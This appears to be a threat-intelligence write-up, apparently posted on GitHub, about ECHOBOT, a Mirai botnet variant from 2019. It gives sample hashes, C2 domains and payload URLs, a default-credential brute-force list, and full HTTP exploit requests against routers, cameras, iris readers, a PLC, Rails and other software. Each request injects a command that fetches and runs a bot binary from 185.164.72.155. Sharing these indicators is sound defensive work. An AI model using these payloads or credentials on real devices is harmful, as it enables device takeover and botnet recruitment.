Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 196 lines (182 sloc) 17.8 KB

A Mirai variant circulating under the name of ECHOBOT surfaced on 6th August 2019, containing a total of 57 unique exploits. While the majority of those exploits have already been seen in the wild in the past, a dozen exploits are new additions to these particular samples, and the first known instance of them being employed by a piece of malware. This conforms to the trend seen with Mirai variants, even moreso with ECHOBOT, wherein authors have been testing the effectiveness of public exploits in terms of gains in bot count. Exploits that infect a greater number of devices are retained or reused in future variants whereas the less effective ones are retired or replaced with other exploits.

Most notably, the new bunch of exploits includes two targeting Biometric Iris readers, and one targeting a Beckhoff PLC. Also included is an exploit against certain Citrix SD-WAN devices, incorporated less than a month after the public release of the vulnerability and exploit. Aside from those, other targeted devices are IP cameras, routers/gateways, and mostly server management/monitoring tools.

IOCs & distinguishing features for these samples have been shared below. Previous research on the same variant can be found here

Sample hashes

0116713cc067ced84b62a55c42218702d576558d3ac8a405703f57977d698d5e
087b6542e2788650c949c8de3ec10b106910f9c2d44d8eb1a4d86a301d409035
09399b5e74a4493399a8d36e1b8a655b0f5c8407c838b03246c5852dd6f7f560
0a48afd3e6700ff1610d28eca9d73a4f5e32e5a1cdd53dad40c7782f323d6725
0f1278aee9ad47873fed8476835d1bc1ef28f1d2c5b3fe07fcb85fb5cdaa3b6e
1318b377aaad56aeb19ab2fdbaec3e051fbf9263ded60d098cb99a7414840187
15f9419b3a3081b822ed75b4afad8f966e97e7f525e8e11e5ad138ff798d9a01
162b5c3300a62b1f79fbd2d29054c66bf581519c4cd30cba6fc3ea4c3abe84be
33ae648bdd89273906b0305eaf2e47e7cae55f1c0cde4cd4fd7f9d86d10b4136
33d3b78da61b2b106765efed7bc314114e3462c19cb54da3609b5a96cbae9faa
382509d3f18a8d6e44301c497f39ad5ac0253301d3ee4210a89404d6858dc319
494f2c5b5e6e963402c10f93612cab0d45d6ae9369f1337c3c7b7c736c19b8c2
55b455acee8b3e273c30f867a2b7ff71d52f46f9aa873cc443878fa9b952ce3a
5bcd94aed01385a28417c161de39e87d919f6f68b9e762498df5d82705bc26af
6e024ceeaa0f896cb96048382bf1d2ab04e6ee28d6f6c78073e87e1389f7b792
79fbccdd13c18356ec8db2de02289fa3dee6b9f8c6ea4576543984439de0eb47
7bc9df1d024873eb39636df225a8d38821ddb272a7d7412f5308717c66305daf
859076a44f01c68b6b256da515d32d741934990c614cc084e054d0db44fc343c
8cc01a1c17b18bbc8008139abbfbb5f82f36980bed34a88fa5b0991a70c79a1d
94cc324151572c88340dd5a1659c493c5599038e33bfaf16dc7fe1972bee793e
94e4dc6fa036427c8bf52e0d40b0e65a7b183deca232cb495cb1f59f75f770f8
9873c6f225a310a5206301bb7e7fe6a9aab897a7ceee2f0fe01bef8ea6b14cbe
9b9aecd20bee9437e375436a7808c4d87661c1bbc424a40f6c2bf344591d4100
9fd62bcc6a5f10ec92bb74ca07530b2c1c8fd9aa791d4a09f5740717b381ddec
a45daaa2259a7b77b507abb1b415551bd8c96c64bf344ed48e09c779d37310f1
b0e83b4a0b75d791c870f643c50732aaee861ea4c4c8a92d431ae7a75346a3f9
c94d88f11b21277cc41b8b302a683a2e5df7346f5b340e31613a12d3172cf523
cb4b181327e0dbab67acef3e6708da26d003ad4bae86593287cfa7fb77bc0d2c
d1b77e1fc0b8a01ea4821f6fe4c7ef9f623e884803b8898bd8c9e1c36110c5a6
d1d8de0491248c38506e586f2d5dc11551354609c6c33ce0d36453997a7e4bd9
d5f06bcebcedbf4840d2d7f59a7579463b6aa8a03a8e6e4aca3a8872375c27bd
fc23196a03222392127e92e30efd6dc4c5a07fb96a9298038c8a629671807121
fcfee5fc93d49bad746ebc65be884b124b83b8003198d5bad4486722b105f6da
fdaa7f0028f457ae95c64f23e4464a935af22bebcfd9b914eb7be26eecde7874

C2s

akuma[.]pw:17
akumaiotsolutions[.]pw:777

URLs

185.164.72.155/richard
185.164.72.155/ECHOBOT.arm
185.164.72.155/ECHOBOT.arm6
185.164.72.155/ECHOBOT.i686
185.164.72.155/ECHOBOT.mips64
185.164.72.155/ECHOBOT.sh4
185.164.72.155/ECHOBOT.x86_64
185.164.72.155/ECHOBOT.arm4
185.164.72.155/ECHOBOT.arm7
185.164.72.155/ECHOBOT.m68k
185.164.72.155/ECHOBOT.mpsl
185.164.72.155/ECHOBOT.spc
185.164.72.155/ECHOBOT.arm5
185.164.72.155/ECHOBOT.i486
185.164.72.155/ECHOBOT.mips
185.164.72.155/ECHOBOT.ppc
185.164.72.155/ECHOBOT.x86
185.62.189.143/richard
185.62.189.143/ECHOBOT.arm
185.62.189.143/ECHOBOT.arm4
185.62.189.143/ECHOBOT.arm5
185.62.189.143/ECHOBOT.arm6
185.62.189.143/ECHOBOT.arm7
185.62.189.143/ECHOBOT.i486
185.62.189.143/ECHOBOT.i686
185.62.189.143/ECHOBOT.m68k
185.62.189.143/ECHOBOT.mips
185.62.189.143/ECHOBOT.mips64
185.62.189.143/ECHOBOT.mpsl
185.62.189.143/ECHOBOT.ppc
185.62.189.143/ECHOBOT.sh4
185.62.189.143/ECHOBOT.spc
185.62.189.143/ECHOBOT.x86
185.62.189.143/ECHOBOT.x86_64

Exploits

New exploits in these samples seen for the first time in the wild

Vulnerability Affected Devices Exploit Format
CVE-2019-12989, CVE-2019-12991 Citrix SD-WAN Appliances (tested on 10.2.2) POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
'SSL_CLIENT_VERIFY' : 'SUCCESS'
get_package_fil:
site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active

User-Agent: Hello-World
Connection: keep-alive
EyeLock nano NXT Remote Code Execution EyeLock NXT Biometric Iris Readers with firmware version 3.5 GET /scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
Iris ID IrisAccess ICU Cross-Site Scripting Iris ID IrisAccess ICU 7000-2 POST /html/SetSmarcardSettings.php HTTP/1.1
Content-Length: 11660
Content-Type: application/x-www-form-urlencoded
Connection: close
X-Powered-By: PHP/5.5.13
User-Agent: joxypoxy/7.2.6

HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
CVE-2015-4051 Beckhoff CX9020 PLCs POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
User-Agent: Hello-World
Host: 192.168.0.1:5120
Content-type: text/xml; charset=utf-8
SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover',0Dh,0Ah
MX: 3
ST: upnp:rootdevice

<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
Xfinity Gateway Remote Code Execution Xfinity Gateways POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1:80
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4
Beward N100 Authenticated Remote Code Execution Beward N100 IP Cameras GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4=
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
Content-type: text/plain
Fritz!Box Webcm Command Injection - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant. Several versions of Fritz!Box devices GET /cgi-bin/webcm HTTP/1.1

var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
FLIR Thermal Camera Command Injection Certain FC-Series S and PT-Series models of FLIR Cameras POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: 192.168.0.1:80
Content-Length: 64
Accept: */*
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Testingus/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.1/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
Connection: close

dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60
Sapido RB-1732 Remote Command Execution Sapido RB-1732 Wireless Routers GET /goform/formSysCmd HTTP/1.1
('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
('</textarea>')

{'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
CVE-2016-0752 Ruby on Rails multiple versions POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
Content-Type: multipart/form-data; boundary=
<%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>
CVE-2014-3914 Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits) POST /SGPAdmin/fileRequest HTTP/1.1
&invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=
CVE-2015-2208 PHPMoAdmin installations POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.0.1:80
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit

Related AutoFocus Tags

Other exploits in the samples (along with function names in unstripped binaries):

Default Credentials

The following are unusual Default Credentials for brute force that I haven't previously seen used by a Mirai variant:

admin/firetide
mysweex/mysweex
hame/
admin/hsparouter
root/aaaaaa
211cmw91765/
cable/
admin/arrowpoint
admin/airlive
public/
admin/urchin
AdvWebadmin/advcomm500349
admin/readwrite
status/readonly
root/skyboxview
rainbow/
admin/allot
gonzo/
admin/publish
root/tooridu
root/trendmsa1.0
admin/AlpheusDigital1010
You can’t perform that action at this time.